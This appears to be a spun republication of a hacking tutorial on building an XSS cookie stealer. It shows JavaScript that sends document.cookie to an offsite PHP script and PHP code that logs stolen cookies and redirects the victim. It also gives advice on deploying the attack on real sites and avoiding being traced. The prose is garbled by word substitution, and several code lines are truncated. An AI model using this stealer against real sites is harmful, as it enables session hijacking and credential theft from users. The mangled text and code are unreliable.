4 months ago

How to Write an XSS Cookie Stealer in JavaScript to Steal Passwords « Null Byte :: WonderHowTo

JavaScript is usually one of the most common languages used on the web. the idea can automate in addition to also animate website components, manage website content, in addition to also carry out many some other useful functions through within a webpage. The scripting language also has many functions which can be used for malicious purposes, including stealing a user’s cookies containing passwords in addition to also some other information.

Cookies are information which a website requests or maintains regarding specific users which visit the page. These cookies contain information about how in addition to also when they visit, as well as authentication information for the site such as usernames in addition to also passwords. As these cookies must be in use whenever a visitor is usually active on a given website, an attacker who can intercept them can steal This particular information in addition to also use the idea to impersonate or catalog information about specific users.

the idea’s possible to utilize JavaScript in order to save or modify a user’s cookies for a given domain. While This particular is usually usually applied in order to create in addition to also use cookies for interactive web development, if an attacker is usually able to maliciously view the same cookies, the idea becomes a valuable hacking technique. JavaScript-based attacks are especially effective when combined with tactics like code injection, as the idea allows malicious code to be executed on what appears to be an otherwise trusted website.

While we don’t advocate stealing anyone’s passwords, This particular guide is usually a must-know topic for any pentester or the idea security professional to understand. If you don’t know how black hat hackers do things, you’ll never be able to catch them.

Don’t Miss: How to Hack Web Browsers with BeEF

Step 1: Creating an HTML Test Page

In order to steal cookies, a cookie must first be available on the web domain the user is usually viewing. This particular happens whenever the user views the website. While the idea’s absolutely possible to inject JavaScript into websites using a man-in-the-middle attack, or by exploiting a vulnerable website, both of these could require additional effort to implement.

The test environment for our cookie will be within a fairly standard HTML index page. We will be able to embed all of our JavaScript elements inline. First, create a completely new directory to contain the HTML file. On a Linux or macOS system, we can use mkdir, as seen below.

mkdir cookiestealer

We can move into This particular directory with cd command, as in This particular example.

cd cookiestealer

Once we’re in This particular folder, we can create our index file with touch by typing the following into a terminal window.

touch index.html

Next, we’ll edit This particular index file too. First, open the file in nano.

nano index.html

Add the basic HTML opening in addition to also closing tags needed. In This particular case, we only need “html” in addition to also “body” tags as no “head” elements are needed to test JavaScript. The file should right now look similar to below.


We can save This particular file by pressing Ctrl+O in nano. At This particular point, if opened in a web browser, our page will be blank. We can add a title element or some basic HTML content, or even add our scripting elements to any web page we’ve created, although for testing purposes, This particular will be sufficient.

Don’t Miss: How to Conduct a Simple Man-in-the-Middle Attack

Step 2: Creating a Cookie

We can create a basic parameter inserted within a cookie by using only 1 string. This particular cookie will only exist within This particular page, in addition to also similarly, the technique used to dump cookies later will apply to any cookie being stored within the page on which the script is usually run or injected.

<script type=”text/javascript”>document.cookie = “username=Null Byte”;</script>

This particular script should be inserted within the “body” section of the HTML file, as seen below.

If the webpage with This particular script is usually opened, a cookie will be set, although nothing will be visible inside browser. We can dump the cookie directly into the page itself using the “document.write” function. This particular won’t be of any use for exporting the cookies without a potential user’s knowledge, although the idea can help us understand the format in which the cookie writing technique works. We can add the following line to our script to test This particular.


Our script should right now look similar to the example below.

<script type=”text/javascript”>
document.cookie = “username=Null Byte”;

When opened in a browser, the idea should look similar to the image below.

We’ve right now successfully set “username=Null Byte” as a cookie with This particular page. We can right now remove the “document.write(document.cookie);” function of the script, as we are instead going to forward the cookies retrieved through the targeted user’s page to an independent, offsite page on which they can be written in addition to also stored by us.

Step 3: Stealing Cookies Using JavaScript

The JavaScript string we’ll use to pass cookies to a server where we can write them to will Just as before utilize the document.cookie parameter, however, the idea will be instead passed inline using a URL as defined in document.location.


In This particular example, the PHP file is usually located on the local machine, or localhost, at In an actual deployment of This particular technique, the idea should point towards a file hosted on a web server which can be resolved to outside of the local network or local machine.

If one was targeting a social media website, the script could be injected within of which site, in addition to also the cookies which are stolen could be sent to an IP or URL of a server controlled by the hacker.

Don’t Miss: How Null Byte Injections Work

For testing purposes, we will be able to host the file locally using PHP’s test server module.

We can enclose This particular JavaScript within script tags, as seen below, on the same HTML page on which we defined a sample cookie.

<script type=”text/javascript”>

The HTML page code should right now look similar to the image below.

This particular JavaScript is usually enough to annex a cookie to a request sent to a PHP URL, in addition to also as such is usually actually the entirety of the JavaScript needed with This particular function. The rest of the processing of the cookie needs to be handled by PHP.

Step 4: Processing Cookies with PHP

We are able to control what we do with the cookie in addition to also where we direct the user who has had their cookies stolen through within the PHP file, defined inside JavaScript string. inside example above, the name of This particular PHP file was cookiestealer.php, in addition to also the idea was located on the local system at

This particular is usually sufficient for a test deployment, although in a real-world scenario the PHP file could be better served using a less obvious name in addition to also located at an external IP or URL.

First, create a completely new PHP file inside same directory as the index.html file. You can do so by typing the following command.

nano cookiestealer.php

After adding PHP opening in addition to also closing brackets, the first element we’ll want to define is usually redirect location, as seen in This particular example.

header (‘Location:

We define This particular as the “Location” following the “header,” in This particular case “https://google.com.” the idea can be set to whatever you choose, so long as the idea’s an address which can be handled by a web browser. To limit the risk of a user becoming aware of an attack, the idea could be best to redirect them to a relevant page on the same domain, such of which they are not alarmed, or become stuck in an infinite loop of the script running over in addition to also over.

With the user redirection established, we can add additional code to process the cookie. First, we’ll assign the cookie as carried by the URL to a variable.

$cookies = $_GET”c”;

Next, we’ll define the file to which the cookies will be saved to on the server which we control. inside example below, the file is usually named “log.txt.”

$file = fopen(‘log.txt’, ‘a’);

Lastly, we’ll combine the variables defined inside above two strings in order to write the variable’s content, the cookie, to our log file.

fwrite($file, $cookies . “nn”);

Our code should right now appear similar to the image below.

With This particular file saved, we’re ready to prepare a test environment for the PHP code.

Step 5: Testing the Cookie Stealer

The type of PHP available on most Linux distributions in addition to also Unix-like operating systems includes a test server. This particular server module is usually modest, limited, in addition to also not suitable for live deployments, although is usually very lightweight in addition to also effective for testing PHP code.

through within the same directory as our index.html in addition to also cookiestealer.php files, we can launch a PHP test server through the command line by typing the following.

php -S

This particular test server right now allows us to test our page by simply opening “” within a web browser on the same machine.

After opening This particular page, our browser will most likely almost immediately resolve to the website we defined as a redirect, in This particular case Google.

If we take a look at our PHP server log, we’ll notice of which an argument was passed to our PHP file in addition to also our PHP code was executed.

Finally, we’ll be able to retrieve the cookies by checking the “log.txt” file which right now exists in our site directory. We can view This particular by using cat inside command line.

cat log.txt

If the log contains the contents of our cookie, in This particular case “username=Null Byte,” then we have successfully stolen cookies using JavaScript!

Step 6: Deploying the Attack

This particular attack is usually extremely valuable for doing damage in addition to also gaining user credentials in any scenario where you’re able to inject code on a site where users may be using cookies. Cookies often contain important user information in plaintext, in addition to also many times contain private keys which can be used to impersonate or log on as the user.

This particular attack could be injected anywhere which an HTML script tag could be inserted. A common test method to test web forms for XSS vulnerability is usually using a simple “alert” string such as the one below.


This particular script will simply attempt to open an alert box such as the example below. If the idea opens, the website is usually vulnerable to XSS.

In a live attack, a hacker could be careful with the way in which the PHP script is usually hosted. If done improperly, the origin of the PHP file could be easily traced back to the hacker. If a tactic such as This particular is usually detected, in order to identify an attacker, the idea could be useful to attempt to seek information on where stolen cookies are being sent in addition to also stored.

This particular method demonstrates just how powerful JavaScript can be as an attack tool. While the idea’s very useful for producing the web more convenient, if a website is usually vulnerable to malicious JavaScript injection the idea can be present a big risk to the site in addition to also the idea’s users. The burden of responsibility for preventing XSS attacks lies on web developers creating secure websites. You can also check out our guide to preventing XSS attacks. If a user does not trust the scripts being run on a website, they can block them using a web browser addon such as NoScript.

I wish you enjoyed This particular article on stealing cookies! If you have any questions or comments about the article, leave them below or reach me on Twitter @tahkion.

Cover photo in addition to also screenshots by Takhion/Null Byte

Incoming search terms:

  • how to write a xss cookiestealer

Leave a Comment

Your email address will not be published. Required fields are marked *

12 + 9 =